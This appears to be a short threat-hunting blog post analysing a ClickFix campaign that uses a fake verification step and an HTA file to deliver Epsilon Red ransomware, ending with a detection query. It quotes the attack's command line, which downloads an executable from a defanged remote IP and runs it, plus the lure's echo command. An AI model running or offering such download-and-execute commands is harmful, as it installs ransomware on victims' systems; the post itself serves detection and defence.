209. Threat Actors Leverage ClickFix to Deploy Epsilon Red Ransomware

Hello everyone!

Zero days without ClickFix. This time an adversary leveraged this technique to deploy Epsilon Red ransomware.

This time the "verification" process was a bit unusual. A victim needed to save copied data as an HTA file, execute it, get the code and paste it to another window.

First, the file executes a command to download and execute an Epsilon Red payload:

cmd /c cd /D %userprofile% && curl -s -o a.exe hxxp://155.94.155[.]227:2269/dw/vir.exe && a.exe

Next, it provides the "code":

cmd /c echo Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4 && pause

And here we have an interesting detection opportunity:

event_type: "processcreatewin"

AND

proc_file_path: "cmd.exe"

AND

cmdline: ("echo" AND "verificatification code")

See you tomorrow!


Comments

Popular posts from this blog

033. Free Google Threat Intelligence Course

082. Huniting for Malicious Browser Extensions

001. The Zeltser Challenge